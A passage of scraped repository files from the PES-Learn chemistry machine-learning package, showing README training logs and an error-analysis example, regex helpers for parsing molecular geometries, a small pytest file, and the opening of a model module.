1.8}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'mm11'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 1.99 Validation set RMSE (cm-1): 1.93 Full dataset RMSE (cm-1): 2.23\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm01'}\nTest set RMSE (cm-1): inf Validation set RMSE (cm-1): inf Full dataset RMSE (cm-1): inf\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std'}\nTest set RMSE (cm-1): 5.83 Validation set RMSE (cm-1): 6.52 Full dataset RMSE (cm-1): 4.99\nHyperparameters: \n{'layers': (16, 16, 16), 'morse_transform': {'morse': True, 'morse_alpha': 1.6}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11'}\nTest set RMSE (cm-1): 2.82 Validation set RMSE (cm-1): 2.70 Full dataset RMSE (cm-1): 2.61\n\n###################################################\n# #\n# Hyperparameter Optimization Complete!!! #\n# #\n###################################################\n\nBest performing hyperparameters are:\n[('layers', (32, 32)), ('morse_transform', {'morse': False}), ('pip', {'degree_reduction': True, 'pip': True}), ('scale_X', {'activation': 'tanh', 'scale_X': 'std'}), ('scale_y', 'std')]\nOptimizing learning rate...\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 1.0}\nTest set RMSE (cm-1): 316275944698408704.00 Validation set RMSE (cm-1): 278706602952744288.00 Full dataset RMSE (cm-1): 269540779801922272.00\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.8}\nTest set RMSE (cm-1): 5.71 Validation set RMSE (cm-1): 4.43 Full dataset RMSE (cm-1): 3.70\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.6}\nTest set RMSE (cm-1): 42.92 Validation set RMSE (cm-1): 27.75 Full dataset RMSE (cm-1): 21.25\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.5}\nTest set RMSE (cm-1): 0.81 Validation set RMSE (cm-1): 0.82 Full dataset RMSE (cm-1): 0.71\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.4}\nTest set RMSE (cm-1): 1.30 Validation set RMSE (cm-1): 0.98 Full dataset RMSE (cm-1): 1.06\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.2}\nTest set RMSE (cm-1): 1.50 Validation set RMSE (cm-1): 1.12 Full dataset RMSE (cm-1): 1.19\nFine-tuning final model...\nHyperparameters: {'layers': (32, 32), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'std', 'lr': 0.5}\nEpoch 1 Validation RMSE (cm-1): 2008.26\nEpoch 2 Validation RMSE (cm-1): 719.83\nEpoch 3 Validation RMSE (cm-1): 411.05\nEpoch 4 Validation RMSE (cm-1): 221.48\nEpoch 5 Validation RMSE (cm-1): 173.03\nEpoch 6 Validation RMSE (cm-1): 149.78\nEpoch 7 Validation RMSE (cm-1): 135.74\nEpoch 8 Validation RMSE (cm-1): 116.26\nEpoch 9 Validation RMSE (cm-1): 93.12\nEpoch 10 Validation RMSE (cm-1): 84.77\nEpoch 11 Validation RMSE (cm-1): 76.86\nEpoch 12 Validation RMSE (cm-1): 72.43\nEpoch 13 Validation RMSE (cm-1): 67.05\nEpoch 14 Validation RMSE (cm-1): 67.59\nEpoch 15 Validation RMSE (cm-1): 56.94\nEpoch 16 Validation RMSE (cm-1): 52.21\nEpoch 17 Validation RMSE (cm-1): 50.24\nEpoch 18 Validation RMSE (cm-1): 43.04\nEpoch 19 Validation RMSE (cm-1): 40.72\nEpoch 20 Validation RMSE (cm-1): 40.88\nEpoch 21 Validation RMSE (cm-1): 38.65\nEpoch 22 Validation RMSE (cm-1): 37.24\nEpoch 23 Validation RMSE (cm-1): 35.34\nEpoch 24 Validation RMSE (cm-1): 33.33\nEpoch 25 Validation RMSE (cm-1): 31.03\nEpoch 26 Validation RMSE (cm-1): 29.64\nEpoch 27 Validation RMSE (cm-1): 28.02\nEpoch 28 Validation RMSE (cm-1): 28.82\nEpoch 29 Validation RMSE (cm-1): 28.59\nEpoch 30 Validation RMSE (cm-1): 30.28\nEpoch 31 Validation RMSE (cm-1): 27.81\nEpoch 32 Validation RMSE (cm-1): 28.24\nEpoch 33 Validation RMSE (cm-1): 28.89\nEpoch 34 Validation RMSE (cm-1): 27.64\nEpoch 35 Validation RMSE (cm-1): 25.40\nEpoch 36 Validation RMSE (cm-1): 23.92\nEpoch 37 Validation RMSE (cm-1): 21.53\nEpoch 38 Validation RMSE (cm-1): 21.10\nEpoch 39 Validation RMSE (cm-1): 20.71\nEpoch 40 Validation RMSE (cm-1): 20.27\nEpoch 41 Validation RMSE (cm-1): 19.77\nEpoch 42 Validation RMSE (cm-1): 19.11\nEpoch 43 Validation RMSE (cm-1): 18.45\nEpoch 44 Validation RMSE (cm-1): 17.98\nEpoch 45 Validation RMSE (cm-1): 17.42\nEpoch 46 Validation RMSE (cm-1): 17.33\nEpoch 47 Validation RMSE (cm-1): 16.71\nEpoch 48 Validation RMSE (cm-1): 15.71\nEpoch 49 Validation RMSE (cm-1): 14.87\nEpoch 50 Validation RMSE (cm-1): 13.95\nEpoch 51 Validation RMSE (cm-1): 13.34\nEpoch 52 Validation RMSE (cm-1): 13.34\nEpoch 53 Validation RMSE (cm-1): 12.74\nEpoch 54 Validation RMSE (cm-1): 12.85\nEpoch 55 Validation RMSE (cm-1): 12.85\nEpoch 56 Validation RMSE (cm-1): 13.28\nEpoch 57 Validation RMSE (cm-1): 13.33\nEpoch 58 Validation RMSE (cm-1): 12.97\nEpoch 59 Validation RMSE (cm-1): 11.80\nEpoch 60 Validation RMSE (cm-1): 11.24\nEpoch 61 Validation RMSE (cm-1): 10.88\nEpoch 62 Validation RMSE (cm-1): 10.15\nEpoch 63 Validation RMSE (cm-1): 9.99\nEpoch 64 Validation RMSE (cm-1): 9.91\nEpoch 65 Validation RMSE (cm-1): 9.44\nEpoch 66 Validation RMSE (cm-1): 9.23\nEpoch 67 Validation RMSE (cm-1): 9.08\nEpoch 68 Validation RMSE (cm-1): 8.83\nEpoch 69 Validation RMSE (cm-1): 8.84\nEpoch 70 Validation RMSE (cm-1): 8.66\nEpoch 71 Validation RMSE (cm-1): 8.35\nEpoch 72 Validation RMSE (cm-1): 8.19\nEpoch 73 Validation RMSE (cm-1): 8.15\nEpoch 74 Validation RMSE (cm-1): 7.91\nEpoch 75 Validation RMSE (cm-1): 7.93\nEpoch 76 Validation RMSE (cm-1): 7.68\nEpoch 77 Validation RMSE (cm-1): 7.59\nEpoch 78 Validation RMSE (cm-1): 7.66\nEpoch 79 Validation RMSE (cm-1): 7.27\nEpoch 80 Validation RMSE (cm-1): 7.03\nEpoch 81 Validation RMSE (cm-1): 6.82\nEpoch 82 Validation RMSE (cm-1): 6.95\nEpoch 83 Validation RMSE (cm-1): 6.64\nEpoch 84 Validation RMSE (cm-1): 6.51\nEpoch 85 Validation RMSE (cm-1): 6.41\nEpoch 86 Validation RMSE (cm-1): 6.49\nEpoch 87 Validation RMSE (cm-1): 6.64\nEpoch 88 Validation RMSE (cm-1): 6.73\nEpoch 89 Validation RMSE (cm-1): 6.77\nEpoch 90 Validation RMSE (cm-1): 6.72\nEpoch 91 Validation RMSE (cm-1): 6.71\nEpoch 92 Validation RMSE (cm-1): 6.43\nEpoch 93 Validation RMSE (cm-1): 6.25\nEpoch 94 Validation RMSE (cm-1): 6.23\nEpoch 95 Validation RMSE (cm-1): 6.18\nEpoch 96 Validation RMSE (cm-1): 6.14\nEpoch 97 Validation RMSE (cm-1): 6.06\nEpoch 98 Validation RMSE (cm-1): 5.73\nEpoch 99 Validation RMSE (cm-1): 5.54\nEpoch 100 Validation RMSE (cm-1): 5.10\nEpoch 101 Validation RMSE (cm-1): 4.82\nEpoch 102 Validation RMSE (cm-1): 4.75\nEpoch 103 Validation RMSE (cm-1): 4.74\nEpoch 104 Validation RMSE (cm-1): 4.66\nEpoch 105 Validation RMSE (cm-1): 4.68\nEpoch 106 Validation RMSE (cm-1): 4.58\nEpoch 107 Validation RMSE (cm-1): 4.60\nEpoch 108 Validation RMSE (cm-1): 4.56\nEpoch 109 Validation RMSE (cm-1): 4.48\nEpoch 110 Validation RMSE (cm-1): 4.36\nEpoch 111 Validation RMSE (cm-1): 4.37\nEpoch 112 Validation RMSE (cm-1): 4.31\nEpoch 113 Validation RMSE (cm-1): 4.22\nEpoch 114 Validation RMSE (cm-1): 4.22\nEpoch 115 Validation RMSE (cm-1): 4.23\nEpoch 116 Validation RMSE (cm-1): 4.19\nEpoch 117 Validation RMSE (cm-1): 4.25\nEpoch 118 Validation RMSE (cm-1): 4.01\nEpoch 119 Validation RMSE (cm-1): 3.89\nEpoch 120 Validation RMSE (cm-1): 3.83\nEpoch 121 Validation RMSE (cm-1): 3.90\nEpoch 122 Validation RMSE (cm-1): 3.89\nEpoch 123 Validation RMSE (cm-1): 3.87\nEpoch 124 Validation RMSE (cm-1): 3.90\nEpoch 125 Validation RMSE (cm-1): 3.96\nEpoch 126 Validation RMSE (cm-1): 3.91\nEpoch 127 Validation RMSE (cm-1): 3.89\nEpoch 128 Validation RMSE (cm-1): 3.98\nEpoch 129 Validation RMSE (cm-1): 4.01\nEpoch 130 Validation RMSE (cm-1): 3.93\nEpoch 131 Validation RMSE (cm-1): 3.77\nEpoch 132 Validation RMSE (cm-1): 3.59\nEpoch 133 Validation RMSE (cm-1): 3.33\nEpoch 134 Validation RMSE (cm-1): 3.22\nEpoch 135 Validation RMSE (cm-1): 3.26\nEpoch 136 Validation RMSE (cm-1): 3.26\nEpoch 137 Validation RMSE (cm-1): 3.26\nEpoch 138 Validation RMSE (cm-1): 3.30\nEpoch 139 Validation RMSE (cm-1): 3.23\nEpoch 140 Validation RMSE (cm-1): 3.13\nEpoch 141 Validation RMSE (cm-1): 3.23\nEpoch 142 Validation RMSE (cm-1): 3.23\nEpoch 143 Validation RMSE (cm-1): 3.22\nEpoch 144 Validation RMSE (cm-1): 3.25\nEpoch 145 Validation RMSE (cm-1): 3.26\nEpoch 146 Validation RMSE (cm-1): 3.09\nEpoch 147 Validation RMSE (cm-1): 3.02\nEpoch 148 Validation RMSE (cm-1): 3.01\nEpoch 149 Validation RMSE (cm-1): 3.04\nEpoch 150 Validation RMSE (cm-1): 2.96\nEpoch 151 Validation RMSE (cm-1): 2.92\nEpoch 152 Validation RMSE (cm-1): 2.88\nEpoch 153 Validation RMSE (cm-1): 2.87\nEpoch 154 Validation RMSE (cm-1): 2.83\nEpoch 155 Validation RMSE (cm-1): 2.91\nEpoch 156 Validation RMSE (cm-1): 2.86\nEpoch 157 Validation RMSE (cm-1): 2.88\nEpoch 158 Validation RMSE (cm-1): 2.78\nEpoch 159 Validation RMSE (cm-1): 2.72\nEpoch 160 Validation RMSE (cm-1): 2.78\nEpoch 161 Validation RMSE (cm-1): 2.78\nEpoch 162 Validation RMSE (cm-1): 2.77\nEpoch 163 Validation RMSE (cm-1): 2.82\nEpoch 164 Validation RMSE (cm-1): 2.82\nEpoch 165 Validation RMSE (cm-1): 2.82\nEpoch 166 Validation RMSE (cm-1): 2.76\nEpoch 167 Validation RMSE (cm-1): 2.75\nEpoch 168 Validation RMSE (cm-1): 2.77\nEpoch 169 Validation RMSE (cm-1): 2.75\nEpoch 170 Validation RMSE (cm-1): 2.75\nEpoch 171 Validation RMSE (cm-1): 2.79\nEpoch 172 Validation RMSE (cm-1): 2.80\nEpoch 173 Validation RMSE (cm-1): 2.71\nEpoch 174 Validation RMSE (cm-1): 2.71\nEpoch 175 Validation RMSE (cm-1): 2.71\nEpoch 176 Validation RMSE (cm-1): 2.70\nEpoch 177 Validation RMSE (cm-1): 2.70\nEpoch 178 Validation RMSE (cm-1): 2.68\nEpoch 179 Validation RMSE (cm-1): 2.68\nEpoch 180 Validation RMSE (cm-1): 2.65\nEpoch 181 Validation RMSE (cm-1): 2.64\nEpoch 182 Validation RMSE (cm-1): 2.63\nEpoch 183 Validation RMSE (cm-1): 2.60\nEpoch 184 Validation RMSE (cm-1): 2.56\nEpoch 185 Validation RMSE (cm-1): 2.58\nEpoch 186 Validation RMSE (cm-1): 2.57\nEpoch 187 Validation RMSE (cm-1): 2.55\nEpoch 188 Validation RMSE (cm-1): 2.53\nEpoch 189 Validation RMSE (cm-1): 2.52\nEpoch 190 Validation RMSE (cm-1): 2.51\nEpoch 191 Validation RMSE (cm-1): 2.44\nEpoch 192 Validation RMSE (cm-1): 2.34\nEpoch 193 Validation RMSE (cm-1): 2.29\nEpoch 194 Validation RMSE (cm-1): 2.24\nEpoch 195 Validation RMSE (cm-1): 2.20\nEpoch 196 Validation RMSE (cm-1): 2.24\nEpoch 197 Validation RMSE (cm-1): 2.24\nEpoch 198 Validation RMSE (cm-1): 2.25\nEpoch 199 Validation RMSE (cm-1): 2.25\nEpoch 200 Validation RMSE (cm-1): 2.23\nEpoch 201 Validation RMSE (cm-1): 2.25\nEpoch 202 Validation RMSE (cm-1): 2.25\nEpoch 203 Validation RMSE (cm-1): 2.25\nEpoch 204 Validation RMSE (cm-1): 2.24\nEpoch 205 Validation RMSE (cm-1): 2.25\nEpoch 206 Validation RMSE (cm-1): 2.25\nEpoch 207 Validation RMSE (cm-1): 2.23\nEpoch 208 Validation RMSE (cm-1): 2.17\nEpoch 209 Validation RMSE (cm-1): 2.11\nEpoch 210 Validation RMSE (cm-1): 2.11\nEpoch 211 Validation RMSE (cm-1): 2.06\nEpoch 212 Validation RMSE (cm-1): 2.04\nEpoch 213 Validation RMSE (cm-1): 2.00\nEpoch 214 Validation RMSE (cm-1): 1.91\nEpoch 215 Validation RMSE (cm-1): 1.85\nEpoch 216 Validation RMSE (cm-1): 1.87\nEpoch 217 Validation RMSE (cm-1): 1.83\nEpoch 218 Validation RMSE (cm-1): 1.82\nEpoch 219 Validation RMSE (cm-1): 1.82\nEpoch 220 Validation RMSE (cm-1): 1.81\nEpoch 221 Validation RMSE (cm-1): 1.81\nEpoch 222 Validation RMSE (cm-1): 1.80\nEpoch 223 Validation RMSE (cm-1): 1.82\nEpoch 224 Validation RMSE (cm-1): 1.77\nEpoch 225 Validation RMSE (cm-1): 1.76\nEpoch 226 Validation RMSE (cm-1): 1.72\nEpoch 227 Validation RMSE (cm-1): 1.67\nEpoch 228 Validation RMSE (cm-1): 1.61\nEpoch 229 Validation RMSE (cm-1): 1.53\nEpoch 230 Validation RMSE (cm-1): 1.57\nEpoch 231 Validation RMSE (cm-1): 1.60\nEpoch 232 Validation RMSE (cm-1): 1.61\nEpoch 233 Validation RMSE (cm-1): 1.63\nEpoch 234 Validation RMSE (cm-1): 1.62\nEpoch 235 Validation RMSE (cm-1): 1.58\nEpoch 236 Validation RMSE (cm-1): 1.53\nEpoch 237 Validation RMSE (cm-1): 1.53\nEpoch 238 Validation RMSE (cm-1): 1.52\nEpoch 239 Validation RMSE (cm-1): 1.52\nEpoch 240 Validation RMSE (cm-1): 1.53\nEpoch 241 Validation RMSE (cm-1): 1.52\nEpoch 242 Validation RMSE (cm-1): 1.52\nEpoch 243 Validation RMSE (cm-1): 1.52\nEpoch 244 Validation RMSE (cm-1): 1.53\nEpoch 245 Validation RMSE (cm-1): 1.53\nEpoch 246 Validation RMSE (cm-1): 1.53\nEpoch 247 Validation RMSE (cm-1): 1.53\nEpoch 248 Validation RMSE (cm-1): 1.52\nEpoch 249 Validation RMSE (cm-1): 1.51\nEpoch 250 Validation RMSE (cm-1): 1.51\nEpoch 251 Validation RMSE (cm-1): 1.51\nEpoch 252 Validation RMSE (cm-1): 1.51\nEpoch 253 Validation RMSE (cm-1): 1.51\nEpoch 254 Validation RMSE (cm-1): 1.51\nEpoch 255 Validation RMSE (cm-1): 1.51\nEpoch 256 Validation RMSE (cm-1): 1.50\nEpoch 257 Validation RMSE (cm-1): 1.49\nEpoch 258 Validation RMSE (cm-1): 1.46\nEpoch 259 Validation RMSE (cm-1): 1.50\nEpoch 260 Validation RMSE (cm-1): 1.46\nEpoch 261 Validation RMSE (cm-1): 1.45\nEpoch 262 Validation RMSE (cm-1): 1.43\nEpoch 263 Validation RMSE (cm-1): 1.44\nEpoch 264 Validation RMSE (cm-1): 1.45\nEpoch 265 Validation RMSE (cm-1): 1.46\nEpoch 266 Validation RMSE (cm-1): 1.46\nEpoch 267 Validation RMSE (cm-1): 1.46\nEpoch 268 Validation RMSE (cm-1): 1.45\nEpoch 269 Validation RMSE (cm-1): 1.44\nEpoch 270 Validation RMSE (cm-1): 1.42\nEpoch 271 Validation RMSE (cm-1): 1.43\nEpoch 272 Validation RMSE (cm-1): 1.41\nEpoch 273 Validation RMSE (cm-1): 1.37\nEpoch 274 Validation RMSE (cm-1): 1.35\nEpoch 275 Validation RMSE (cm-1): 1.30\nEpoch 276 Validation RMSE (cm-1): 1.30\nEpoch 277 Validation RMSE (cm-1): 1.31\nEpoch 278 Validation RMSE (cm-1): 1.32\nEpoch 279 Validation RMSE (cm-1): 1.28\nEpoch 280 Validation RMSE (cm-1): 1.30\nEpoch 281 Validation RMSE (cm-1): 1.30\nEpoch 282 Validation RMSE (cm-1): 1.29\nEpoch 283 Validation RMSE (cm-1): 1.28\nEpoch 284 Validation RMSE (cm-1): 1.28\nEpoch 285 Validation RMSE (cm-1): 1.28\nEpoch 286 Validation RMSE (cm-1): 1.28\nEpoch 287 Validation RMSE (cm-1): 1.28\nEpoch 288 Validation RMSE (cm-1): 1.29\nEpoch 289 Validation RMSE (cm-1): 1.28\nEpoch 290 Validation RMSE (cm-1): 1.28\nEpoch 291 Validation RMSE (cm-1): 1.28\nEpoch 292 Validation RMSE (cm-1): 1.29\nEpoch 293 Validation RMSE (cm-1): 1.27\nEpoch 294 Validation RMSE (cm-1): 1.26\nEpoch 295 Validation RMSE (cm-1): 1.26\nEpoch 296 Validation RMSE (cm-1): 1.26\nEpoch 297 Validation RMSE (cm-1): 1.25\nEpoch 298 Validation RMSE (cm-1): 1.25\nEpoch 299 Validation RMSE (cm-1): 1.26\nEpoch 300 Validation RMSE (cm-1): 1.26\nEpoch 301 Validation RMSE (cm-1): 1.27\nEpoch 302 Validation RMSE (cm-1): 1.27\nEpoch 303 Validation RMSE (cm-1): 1.24\nEpoch 304 Validation RMSE (cm-1): 1.21\nEpoch 305 Validation RMSE (cm-1): 1.17\nEpoch 306 Validation RMSE (cm-1): 1.21\nEpoch 307 Validation RMSE (cm-1): 1.21\nEpoch 308 Validation RMSE (cm-1): 1.19\nEpoch 309 Validation RMSE (cm-1): 1.19\nEpoch 310 Validation RMSE (cm-1): 1.21\nEpoch 311 Validation RMSE (cm-1): 1.20\nEpoch 312 Validation RMSE (cm-1): 1.19\nEpoch 313 Validation RMSE (cm-1): 1.18\nEpoch 314 Validation RMSE (cm-1): 1.18\nEpoch 315 Validation RMSE (cm-1): 1.16\nEpoch 316 Validation RMSE (cm-1): 1.14\nEpoch 317 Validation RMSE (cm-1): 1.12\nEpoch 318 Validation RMSE (cm-1): 1.11\nEpoch 319 Validation RMSE (cm-1): 1.10\nEpoch 320 Validation RMSE (cm-1): 1.10\nEpoch 321 Validation RMSE (cm-1): 1.10\nEpoch 322 Validation RMSE (cm-1): 1.10\nEpoch 323 Validation RMSE (cm-1): 1.11\nEpoch 324 Validation RMSE (cm-1): 1.12\nEpoch 325 Validation RMSE (cm-1): 1.13\nEpoch 326 Validation RMSE (cm-1): 1.11\nEpoch 327 Validation RMSE (cm-1): 1.11\nEpoch 328 Validation RMSE (cm-1): 1.11\nEpoch 329 Validation RMSE (cm-1): 1.10\nEpoch 330 Validation RMSE (cm-1): 1.10\nEpoch 331 Validation RMSE (cm-1): 1.10\nEpoch 332 Validation RMSE (cm-1): 1.10\nEpoch 333 Validation RMSE (cm-1): 1.10\nEpoch 334 Validation RMSE (cm-1): 1.10\nEpoch 335 Validation RMSE (cm-1): 1.10\nEpoch 336 Validation RMSE (cm-1): 1.10\nEpoch 337 Validation RMSE (cm-1): 1.10\nEpoch 338 Validation RMSE (cm-1): 1.10\nEpoch 339 Validation RMSE (cm-1): 1.10\nEpoch 340 Validation RMSE (cm-1): 1.10\nEpoch 341 Validation RMSE (cm-1): 1.10\nEpoch 342 Validation RMSE (cm-1): 1.11\nEpoch 343 Validation RMSE (cm-1): 1.11\nEpoch 344 Validation RMSE (cm-1): 1.10\nEpoch 345 Validation RMSE (cm-1): 1.11\nEpoch 346 Validation RMSE (cm-1): 1.09\nEpoch 347 Validation RMSE (cm-1): 1.09\nEpoch 348 Validation RMSE (cm-1): 1.08\nEpoch 349 Validation RMSE (cm-1): 1.07\nEpoch 350 Validation RMSE (cm-1): 1.05\nEpoch 351 Validation RMSE (cm-1): 1.05\nEpoch 352 Validation RMSE (cm-1): 1.05\nEpoch 353 Validation RMSE (cm-1): 1.02\nEpoch 354 Validation RMSE (cm-1): 0.96\nEpoch 355 Validation RMSE (cm-1): 0.95\nTest set RMSE (cm-1): 1.04 Validation set RMSE (cm-1): 0.95 Full dataset RMSE (cm-1): 0.80\nModel optimization complete. Saving final model...\nSaving ML model data...\nTotal run time: 957.76 seconds\n```\n</details>\n\n\nThe final results is a Test/Validation/Full dataset RMSE (cm-1) of 1.04, 0.95, and 0.80, respectively. Not quite as good as the GP models, but still about as accurate as you would ever want it to be! \n\n### 3.4 Using the Neural Network models\nThe neural networks can be used in the exact same way as the GP models outlined above in section 3.2! The trained model is easily accessible using the `compute_energy.py` file. Model performance and the datasets are also saved. \n\n\n### 3.5 Analyzing model performance using Python\nOne can use Python to further analyze the performance of a PES-Learn ML model. Here's a simple example of how to evaluate the error of a PES-Learn ML model as a function of energy relative to the global minimum. The following python file `analyze.py` must be in the same directory as the auto-generated `compute_energy.py` file, the dataset file `PES.dat`, and the saved ML model file `model.json` or `model.pt` depending on if it is a GP or NN model. \n\n```python\nfrom compute_energy import pes\nimport pandas as pd\n\n# load data\nfull_dataset = pd.read_csv('PES.dat')\n# Split data into column arrays of geometries and energies\ngeoms = full_dataset.values[:, :-1]\nenergies = full_dataset.values[:, -1].reshape(-1,1)\n\n# Geometries are ready to be sent through the model\npredicted_energies = pes(geoms, cartesian=False)\n\n# Prepare a plot of energy vs prediction error\nrelative_energies = (energies - energies.min())\nerrors = predicted_energies - energies\n\n\n# Plot error distribution\nimport matplotlib.pyplot as plt\nrelative_energies *= 627.509 # convert to kcal/mol\nerrors *= 627.509\nplt.scatter(relative_energies, errors)\nplt.axhline(color='black')\nplt.xlabel('Energy (kcal/mol)')\nplt.ylabel('Prediction Error (kcal/mol)')\nplt.show()\n```\n\n![plot](plot.png)\n" }, { "alpha_fraction": 0.6105157136917114, "alphanum_fraction": 0.6359678506851196, "avg_line_length": 35.414634704589844, "blob_id": "3a5a5f3a1f52843a01bd6d55060b2c57f4050461", "content_id": "fdb717b92cee592e8252d1b4c886d58dacbaf0ef", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2986, "license_type": "permissive", "max_line_length": 135, "num_lines": 82, "path": "/peslearn/utils/regex.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nContains variables and functions for simplifying regex code\n\"\"\"\n\ndef maybe(string):\n \"\"\"\n A regex wrapper for an arbitrary string.\n Allows a string to be present, but still matches if it is not present.\n \"\"\"\n return r'(?:{:s})?'.format(string)\n\ndef one_or_more(string):\n \"\"\"\n A regex wrapper for an arbitrary string.\n Allows an arbitrary number of successive valid matches (at least one) to be matched.\n \"\"\"\n return r'(?:{:s}){{1,}}'.format(string)\n\ndef two_or_more(string):\n \"\"\"\n A regex wrapper for an arbitrary string.\n Allows an arbitrary number of successive valid matches (at least two) to be matched.\n \"\"\"\n return r'(?:{:s}){{2,}}'.format(string)\n\n# save some common regex features as human readable variables\nletter = r'[a-zA-Z]'\n# floating point number with optional scientific notation\ndouble = r'-?\\d+\\.\\d+' + maybe('[E,e]' + '-?\\d+')\ninteger = r'\\d+'\nwhitespace = r'\\s'\nendline = r'\\n'\n# zero or more whitespace (ws) followed by the regex feature \nws_double = r'[ \\t]*' + double \nws_endline = r'[ \\t]*' + endline \nws_int = r'[ \\t]*' + integer \n\n# a regex identifier for an xyz style geometry line, atom_label x_coord y_coord z_coord\nxyz_line_regex = r'[ \\t]*' + letter + maybe(letter) + 3 * ws_double + ws_endline\n# an xyz style geometry block of any size\nxyz_block_regex = two_or_more(xyz_line_regex)\n\n# define generalized compact internal coordinates regex identifier\n# e.g.\n# O\n# H 1 1.0\n# H 1 1.0 2 104.5\n# H 1 1.0 2 100.00 3 180.0\n\nintcocompact_1 = r'[ \\t]*' + letter + maybe(letter) + ws_endline\nintcocompact_2 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_double + ws_endline\nintcocompact_3 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_double + ws_int + ws_double + ws_endline\nintcocompact_4 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_double + ws_int + ws_double + ws_int + ws_double + ws_endline\n\n# assume at least two atoms\nintcoords_compact_regex = intcocompact_1 + intcocompact_2 + maybe(intcocompact_3) + maybe(one_or_more(intcocompact_4))\n\n# define generalized standard internal coordinates regex identifier\n# e.g.\n# O\n# H 1 ROH\n# H 1 R2 2 AHOH\n# H 1 R3 2 A2 3 D1\n# ...\n# ROH = 1.0\n# R2 = 1.1\n# R3 = 1.2\n# AHOH = 100.5\n# A2 = 90.0\n# D1 = 120.00\n\ncoord_label = one_or_more(letter) + maybe(one_or_more(integer))\nws_coord_label = r'\\s*' + coord_label\n\n# zero or more spaces/tabs, atom label, connectivity and coordinate labels \nintco_1 = r'[ \\t]*' + letter + maybe(letter) + ws_endline\nintco_2 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_coord_label + ws_endline\nintco_3 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_coord_label + ws_int + ws_coord_label + ws_endline\nintco_4 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_coord_label + ws_int + ws_coord_label + ws_int + ws_coord_label + ws_endline\n\n# assume at least two atoms\nintcoords_regex = intco_1 + intco_2 + maybe(intco_3) + maybe(one_or_more(intco_4))\n" }, { "alpha_fraction": 0.6236110925674438, "alphanum_fraction": 0.6541666388511658, "avg_line_length": 27.760000228881836, "blob_id": "509c69e1944a381d184d36c7003923c20a7790d5", "content_id": "e381c80dd80bf4d28b75f430168e54135c618991", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "permissive", "max_line_length": 72, "num_lines": 25, "path": "/tests/test_molecule.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the Atom/Molecule classes \n\"\"\"\n\nimport peslearn\nimport pytest\n\npath = 'tests/datafiles/input_zmat_1'\nwith open(path, 'r') as f:\n input_string = f.read()\n\ninput_obj = peslearn.InputProcessor(input_string)\nmol = peslearn.datagen.Molecule(input_obj.zmat_string)\n\ndef test_extract_zmat():\n assert mol.n_atoms == 4\n assert mol.atom_labels == ['C','H','H','H']\n assert mol.geom_parameters == ['RCH1', 'r2', 'a1', 'r3', 'a2', 'D1']\n\ndef test_molecule_update_intcoords():\n newmol = peslearn.datagen.Molecule(input_obj.zmat_string)\n disp = {'RCH1': 2.0, 'r2': 1.0}\n newmol.update_intcoords(disp)\n assert newmol.atoms[1].intcoords['RCH1'] == 2.0\n assert newmol.atoms[2].intcoords['r2'] == 1.0\n\n" }, { "alpha_fraction": 0.5818356275558472, "alphanum_fraction": 0.5867481231689453, "avg_line_length": 39.31401062011719, "blob_id": "016380149932203868548a9e5012d8ac340f3f66", "content_id": "4772074dbbd0e6fa6ba5632fd601485e64113df0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8346, "license_type": "permissive", "max_line_length": 133, "num_lines": 207, "path": "/peslearn/ml/model.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from .data_sampler import DataSampler \nfrom ..constants import hartree2cm, package_directory \nfrom ..utils.regex import xyz_block_regex\nfrom ..utils.geometry_transform_helper import load_cartesian_dataset\nfrom abc import ABC, abstractmethod\nimport re\nimport pandas as pd\nimport warnings\nimport numpy as np\nimport sklearn.metrics\n# GPy and sklearn output a bunch of annoying warnings\nwarnings.simplefilter(action='ignore', 